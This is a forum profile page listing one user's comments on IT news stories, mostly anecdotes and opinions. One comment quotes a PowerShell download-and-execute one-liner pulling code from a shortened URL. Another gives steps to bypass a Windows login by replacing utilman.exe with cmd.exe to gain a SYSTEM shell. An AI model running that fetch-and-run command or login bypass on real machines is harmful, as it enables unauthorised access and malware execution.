* Posts by Stu J

141 posts • joined 5 Aug 2009

Page:

Come fly with me. But first we need to find a boot device

Stu J

Could be worse...

The company I worked for commissioned hundreds of displays in a US airport about 10 years ago. Unfortunately someone forgot to update the commissioning instructions to confirm that the "AC Power Failure" behaviour was correctly set in the BIOS to "Power On", and a bug in the BIOS meant that it forgot the previous power state.

When the airport power failed for no more than 15 mins, a small group of panicked 1st line guys had to scurry round the airport with step ladders and scissor lifts to poke the Power button on every single display controller... And then go round them all at night with a USB keyboard and change the BIOS settings to ensure they always powered back on after a power failure!

Undebug my heart: Using Cisco's IOS to take down capitalism – accidentally

Stu J

Reminds me of a former colleague in 1st line support that would occasionally remotely run pssuspend on outlook.exe on the CEO's laptop, be first to answer the phone when it rang, then would magically fix the issue. The CEO loved how responsive and attentive he was, and always managed to fix the issue within a few minutes,

AWS offers you the opportunity to pay cloud bills before they’ve been issued

Stu J

Interesting...

One regular gripe AWS has been dealing with for years has been the fact that there's no foolproof way to stop sandbox/dev accounts from accidentally running up massive bills. I wonder/hope if this is the first step towards accounts where you don't have to attach a credit card, and when your balance hits zero, your services switch off and your costs stop rising...

Would mean they could potentially do away with the Free Tier, reduce the pricing of the lowest tier of each service to compensate, and credit new accounts with $200, or something like that.

Fingers crossed...

UK Special Forces soldiers' personal data was floating around WhatsApp in a leaked Army spreadsheet

Stu J
FAIL

Fuckssake

:facepalm:

A trip to the dole queue: CEO of $2bn Bay Area tech biz says he was fired for taking LSD before company meeting

Stu J

Re: Stoned web design

https://xkcd.com/323/

The wrong guy: Backup outfit Spanning deleted my personal data, claims Cohesity field CTO

Stu J

What a tool...

Didn't read the EULA.

Didn't do his sums.

If it's too good to be true, it probably is.

Assuming even at bulk hard disk prices with no resilience, you're talking at least $10 per TB, or minimum $360 for the amount he was storing. Mirror it and it's $720. And then there's data transfer costs too. Far less than the total amount he paid. He thought it was a "win-lose" situation, it was actually a "lose-lose" situation.

It's AWS-hosted - and even at Glacier prices, 36TB would be $1770 per year. No wonder they fucked him off, the only surprise is they didn't do it much MUCH sooner...!

Also, if they'd let him export his 36TB backup, then the AWS Data Egress charges would have been over $3,000. I'm not surprised they just threw it in the bin if they were legally covered to do so...

Rookie's code couldn't have been so terrible that it made a supermarket spontaneously combust... right?

Stu J

Re: The power of coincidence

I once pressed "Online" on my parents dot matrix printer (my mum couldn't get it to print, for obvious reasons), and the electrical substation opposite their house exploded...

We didn't collude with Twitter to throw Parler off our servers, says AWS in court filing

Stu J
Trollface

Re: False

Why would Melania be taking a flight to a suburb of North Manchester anyway? ;-)

Pizza and beer night out the window, hours trying to sort issue, then a fresh pair of eyes says 'See, the problem is...'

Stu J

Boiler

Once called out a boiler repair service to fix my boiler which wasn't coming on at all. The guy flipped open the front panel, and flicked the timer control switch from "off" to "manual", the boiler fired up immediately, and he thanked me for the easiest job he'd had all day, and knocked off an hour or two earlier than he'd expected to.

My wife and kids all denied having touched the switch. I knew I hadn't, and had assumed because it was in a cupboard behind the front panel that nobody else would have touched it. Never figured to actually check...

Samsung to introduce automatic call blocking on Android 11-capable flagships

Stu J

Play along

The best thing you can do - if you have the time - is play along with them.

"Oh there's a problem with my Internet? Someone's hacked it? How terrible!"

And when they start giving you instructions, pretend that you're following them, but with the skill and pace of a blind octogenarian. Tell them you've just turned your PC on and it's installing Windows Updates. Keep them waiting a good 10-15 minutes while updating them on the fictional percentage from time to time.

When they get to the point where they ask you to download TeamViewer or something similar, tell them it's taking a long time to download. Eventually pretend you've done it. But it wants you to reboot as part of the installation process. Reboot. More Windows Update fun on reboot. When they eventually ask for the TeamViewer code, make up some bollocks number. Then start questioning yourself "is that a 1 or an I". Eventually they'll probably give up.

Basically if you can keep them on the line for half an hour, that's half an hour they can't be scamming some poor bastard who doesn't know any better. It makes their business model a bit less profitable.

Devs strung up about .NET 5.0 string changes that may break working code are told: It's not a bug, it's a feature

Stu J

Re: To be fair to Microsoft

It was best practice back when I did my MCPD in .NET 2.0 (here be dragons) to *explicitly* specify both the culture for certain methods (often just Invariant, or using e.g. ToUpperInvariant), and the comparison method, because if someone buggered about with the Culture settings in Windows, your application could end up behaving differently.

Not a lot of sympathy if people have been too lazy to do it or get a linter to do it for them to be honest... They're the same people that don't pay attention to the collation settings on databases then wonder why queries don't behave as expected on some deployments...

Microsoft to pull support for PHP: Version 8? Exterminate, more like...

Stu J

Re: PHP

Nope, not trolling. I used PHP in a past life for a couple of years. It's very easy to do simple things very badly, and quite difficult to do complicated things well, compared to other languages and frameworks.

PHP's a toy language really. As a hiring manager I certainly wouldn't hold having worked with PHP against anyone, but anyone that thought it was a good technology choice for a new project wouldn't be coming back for a second interview. I can't honestly think of a use case for it any more where there isn't an obvious better choice.

Stu J
Flame

PHP

Just needs to f**k off and die already.

By emptying offices, coronavirus has hastened the paperless office

Stu J

Re: erm, homeschooling

Yeah, stationery companies have started offering me corporate discounts on paper and ink refills

In Hancock's half-hour, Dido Harding offers hollow laughs: Cake distracts test-and-trace boss at UK COVID-19 briefing

Stu J

I got the test result late on Friday night, negative as expected.

What feels like the biggest con, is that allegedly they're treating the home test they send out as 2 tests, because you're swabbing both your tonsils and one of your nostrils. But it's the same swab for both locations (tonsils first, then nostril), sent to the lab in a single tube.

If it is true, it's a scam of the highest order, purely designed to make the test capacity look higher than it is. It may also explain why they refuse to detail the number of people tested - when they could clearly get that data, as you have to enter your NI number to order the test......

Stu J
Pint

I ordered a test on Monday (as part of a study, I've not got symptoms, just hay fever).

It was delivered on Tuesday.

I did it on Tuesday night and a courier collected it on Wednesday morning.

Still not had a result.

If I was ill, contact tracing wouldn't have started by now, and people I'd potentially infected would still be wandering round oblivious.

Whereas the Ceredigion tracing process was based on people being symptomatic, not testing positive. Which is why they've only had 46 cases in the entire county.

The testing clearly still isn't fit for purpose, and by extension neither is the tracing. Piss up and brewery spring to mind.

In fact, it's beer-o-clock...

It could be 'five to ten years' before the world finally drags itself away from IPv4

Stu J

I keep trying...

Every few weeks I turn on IPv6. And after 2 or 3 days, when some of the websites I visit don't load any photos or pictures, I turn it off again. Either my wifi or router's flaky, or something else is. But IPv4 "just works" and IPv6 "stops working" frequently...

UK, Ireland users call on SAP to extend indirect licensing deadline again as COVID-19 ravages project plans

Stu J
Flame

Licensing indirect access per "user" is a fucking scam

That is all

Brit IT infrastructure giant Computacenter hits pause on shareholder dividends after furloughing 10% of staff

Stu J

Surely no sensible company should be thinking about paying dividends at the moment - if you've got cash in the bank, use it to pay your staff if possible, and otherwise use it to keep yourself afloat until the current crisis passes......?

Microservices guru warns devs that trendy architecture shouldn't be the default for every app, but 'a last resort'

Stu J

Re: Glad I read this

It's not always a valid approach though.

Running multiple instances of a monolith (and by this I'm talking about some of the enterprise-sized monoliths I've come across that required upwards to 32GB/RAM per instance just to get them online...) can be very expensive, and unless your monolith has been explicitly designed to scale horizontally, you invariably run into problems with session management to the extent that it's often impossible to scale dynamically, so you end up over-provisioning to cope with peak load.

I'm a big fan of the strangler pattern - stick a proxy load-balancer in front of all API calls to your monolith, and once you've identified particular areas that you want to be able to scale dynamically and rapidly, break those out as microservices and redirect the calls from the load-balancer to those services, then remove that functionality from the monolith. There's no real reason why the optimal solution shouldn't be a combination of monolith and microservices.

Criminalise British drone fliers, snarl MPs amid crackdown demands

Stu J

This is the only place you really need to look

https://drones.nats.aero/page/app

The bits that are pink and are Class D Airspace aren't prohibited, you've just got to be aware. For example, the Class D airspace above me is part of the Manchester CTR, and although aircraft traverse it going in to both Liverpool and Manchester, they shouldn't ever be below 1,400ft (if they are, we got bigger problems given how far out from both airports I am), and my drone should never be above 400ft, so there shouldn't ever be a risk of conflict.

Specifically, the CAA states: "There are no separate regulations in place regarding the flight of small unmanned aircraft in controlled airspace below 400 ft (Class A,B,C,D,E)", so even though I'm technically in Class D airspace SFC-3500, as far as drones go it's 400-3500, which is a moot point.

TL;DR - There's plenty of places you can fly your drones.

Stalking cheap Chinese GPS child trackers is as easy as 123... 456 – because that's the default password on 600k+ of these gizmos

Stu J

Kite Mark?

About time we had some sort of Kite Mark/CE certification for IoT crap that at the very least checked that it wasn't this bloody easy to hack...

Microsoft Surface users baffled after investing in kit that throttles itself to the point of passing out

Stu J

I'm just guessing here that - in context - it might be:

PROCessor HOT

?

UK privacy watchdog threatens British Airways with 747-sized fine for massive personal data blurt

Stu J

Pretty sure fines aren't tax-deductible...

Edit:

https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515

"Regulatory bodies

Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."

Trolling in the Reg's forums... we mean, er, 'working' on the train still rubbish thanks to patchy data coverage

Stu J

Definite improvement...

I've just started commuting by train again after a hiatus of about 7 years, and was pleasantly surprised that I get 4G almost all the way to work - good enough to maintain a usable SSH session, and to actually "work" on the train.

The journey takes about an hour, and is mostly rural, and 7 years ago there was bugger all coverage for most of it - and what there was was 2G at best in the small towns and villages, and very little in-between. Now it seems the only not-spot is as we come into the suburbs on the edge of the city...

Sysadmin cracked military PC’s security by reading the manual

Stu J

Windows

1. Take hard disk out of PC

2. Hang on another PC

3. Copy cmd.exe over the top of utilman.exe (may need to fart about with permissions)

4. Put hard disk back in original PC and boot

5. Click on accessibility icon when Windows Logon screen appears

6. Marvel at the command prompt that appears running in the context of SYSTEM

7. Use command line tools to create a new user, as member of administrators group

8. Full logged-in admin access to operating system at your fingertips

Yes, Bitlocker generally thwarts this approach; but it's a fairly quick way to earn £50 for unlocking people's home PCs when they've managed to forget their password.

National ID cards might not mean much when up against incompetence of the UK Home Office

Stu J

NI Number is already created (if not formally "issued") at birth, as anyone with children who have "Child Trust Funds" will no doubt have spotted that their child's unique reference number follows a suspiciously familiar alphanumeric pattern...

Boss sent overpaid IT know-nothings home – until an ON switch proved elusive

Stu J

Cables under desks

As a summer job when at Uni, I worked in desktop support at a government scientific research establishment. One day I got a ticket to go and deal with the brand new CEO, who was some incredibly eminent Professor in his field. He couldn't get Outlook to update his email. After a quick ping determined no network connectivity, I followed the purple network cable out of the back of his PC, under his desk, where it was tangled with a green network cable, which was plugged into the wall socket. Plug the purple cable into the wall, and hey presto everything worked... He sheepishly admitted he'd rearranged his own office furniture and recabled things himself...

Sysadmin unplugged wrong server, ran away, hoped nobody noticed

Stu J

My bet is that it was Harwell...

(radioactive)

'Every little helps'... unless you want email: Tesco to kill free service

Stu J

Re: Damn

+1 for Fastmail, 14-year satisfied customer here...

Apple, if you want to win in education, look at what sucks about iPads

Stu J

Walled Garden

There is no way schools should be buying in to walled gardens of any forms with the taxpayer's money.

UK worker who sold customers' data to nuisance callers must cough up £1k

Stu J

Computer Misuse Act

Why wasn't he prosecuted (and jailed) under the Computer Misuse Act for unlawfully accessing a computer system for unauthorised purposes (i.e. nicking the data)...?

Electric cars to create new peak hour when they all need a charge

Stu J

Re: actually no

As per some other comments, most EVs can cope with a two-way commute plus some nipping about in the evening without a recharge...

And similarly, per comments about letting the market decide - that's where smart meters come in. My car's configured not to charge between 4pm and 11:59pm, simply because my per-unit rate jumps from 11p to 24p at 4pm, back down to 11p at 7pm, and down to 5p between midnight and 6am. The only way I'm ever going to charge between 4pm and midnight is if I'm desperate... So market forces can, do, and will help spread the "load" (literally and figuratively)

OK, Google: Why does Chromecast clobber Wi-Fi connections?

Stu J

Re: when in tandem...

Even better - go for the VigorBX 2000n...

> in-built VDSL modem

> 4G dongle backup option (if you want/need it)

> VOIP PBX capability (it even supports your existing analogue line and phone, but the sound quality's a bit crappy - VOIP calls using a VOIP provider is perfect though)

WW2 Enigma machine to be seized from shamed pharma bro Shkreli

Stu J

Re: The sole copy of Once Upon a Time in Shaolin

Giving it away for free wouldn't be distributing it commercially...

UK council fined £150k for publishing traveller family's personal data

Stu J

Grrrr

Once again, the taxpayer coughs up and the council cretins just waste more taxpayers' money.

It's about time the legislation held individuals in public sector organisations personally accountable.

If the drone responsible for the breach is paid £20k, their boss £40k, their boss £80k, and the CEO of the council £160k, then the fine should be levied vaguely proportionately on their take-home pay over the next year - the drone should pick up £0 (but may well be fired if it can be shown they've blatantly disregarded procedure), the boss £10k, the next boss £30k, the CEO £70k, and the council forced to invest the remaining £40k into systems and processes to stop it from happening again...

Panasonic wants you to wear Li-Ion batteries. The ones that explode

Stu J

Re: PCMCIA

I had a PCMCIA CD-ROM drive for my A1200...

Alleged hacker Lauri Love loses extradition case. Judge: Suicide safeguards in place

Stu J

This should be simple...

Did he ever set foot in the USA during, or since he committed the crime?

If no, then the USA have no jurisdiction over this case, end of, and any extradition should be automatically denied on that basis.

He should be tried in the UK though, and Aspergers isn't a defence, although it may be a mitigating factor when it comes to sentencing.

App-V birthday to you, Win10: Virty tools baked in Anniversary update

Stu J

And so it begins...

Con people into using a technology, then one Windows update later, it's gone. You want it back? £££££...

Rinse, repeat.

Brexit? Cutting the old-school ties would do more for Brit tech world

Stu J

You don't need money to get into Oxford or Cambridge

Just saying...

ICO fines NHS trust £185K for publicly airing personnel files

Stu J

Re: Im sorry

If it's not the NHS, it's the councils losing their own taxpayers' data, then paying the fine with...their taxpayers' taxes...

Sod firing them, let's start with jail time for the execs at the top. And work down the chain. And until each level in the chain can prove that they've done everything possible to prevent data breaches, in terms of systems, policies, and training, only then does the lowly minion who actually copied the stuff onto a USB stick and left it on a train get jail time.

It's the only way the decision makers will ever take it seriously.

And no taxpayer funded body should EVER be fined, no matter what they do. It should always be someone either losing their job, or going to prison.

Finance bods SWIFT to update after Bangladesh hack

Stu J

Cheap switches usually don't have the capability to manage and monitor, and cheap second-hand switches are usually cheap because they're EoL or near as damn it - which means any vulnerabilities in the firmware won't be fixed.

The choice of such switches at that time doesn't necessarily mean they weren't fit for purpose at that point in time, however at best it's a short-sighted approach that reflects the attitude of the morons that put them in place. More telling, however, is the lack of firewall. That's just a case of "WTF???"

The web is DOOM'd: Average page now as big as id's DOS classic

Stu J

Re: Yep

Seem to remember it fit on a single 880KB floppy on the Amiga...

India orders 770 million LED light bulbs, prices drop 83 per cent

Stu J

Re: Who's paying the piper?

JFYI, there are LED streetlight replacement projects running in various areas of the UK...

Get lost, Windows 10 and Phone fans: No maps HERE on Microsoft's OS

Stu J

Re: I like Here.

Don't think that's anything specifically to do with the app somehow, unless it's not using the full capabilities of the GPS?

I often use Google Maps on commuter flights at speeds ranging from 0-500mph, altitudes from 0ft to 40,000ft, and never have any problems with it once the GPS locks on - and sluggish GPS lock-on isn't really an app issue.

Attackers packing malware into PowerShell

Stu J

The power of PowerShell

This:

iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

SpaceX Falcon 9 grounded by 'sledgehammer' winds

Stu J

Re: Why super-cooled fuel?

Anecdotally, the diameter of the SpaceX rockets was limited by the height of the lowest bridge that Elon Musk couldn't pay to have raised or demolished, between the factory and their original test site, minus the height of the low-loader the rockets were shipped on...

Now you can easily see if a site's HTTP headers are insecure, beams dev

Stu J

Hall of Shame

As of 11:51 GMT, "www.theregister.co.uk" is top of their Hall of Shame :-)

And no, it wasn't me that tested it, it was like that when I clicked on the link!

TalkTalk hired BAE Systems' infosec bods before THAT hack

Stu J

TalkTalk customers - have some balls!

Just cancel your direct debit, write to TalkTalk, send them a cheque for the value of any service up to today's date so that you're fully paid up, tell them that as they have breached their due care you are unilaterally terminating your contract with them, you will no longer consume their services (I.E. unplug everything), you require them to release your MAC with immediate effect, and that you reserve the right to take further civil or criminal action against them in the event of any losses incurred, including any loss caused by not being able to use phone/Internet caused by them delaying the release of your MAC, and any legal costs incurred if they force you to take the matter to court.

Sysadmin ignores 25 THOUSAND patches, among other sins

Stu J

Re: 25,000 patches sounds pretty bad, but...

And how does one know without manually auditing every single patch?

WSUS tells you whether patches are standalone, or if they supersede or are superseded by (or both) other patches. It's very easy to select all superseded patches and decline them, as a starter for ten...

Also, given the job this useless tit had done, it wouldn't surprise me if he'd not selected the correct product types/languages, and appropriate levels of patching, which probably would have reduced the 25,000 considerably. Additionally, older versions of Windows included patches for Itanium/IA64 which a quick search/decline in WSUS would knock a fair few off the list too (guessing on a hunch that they weren't running Itanium infrastructure).

Page:

SUBSCRIBE TO OUR WEEKLY TECH NEWSLETTER

Biting the hand that feeds IT © 1998–2021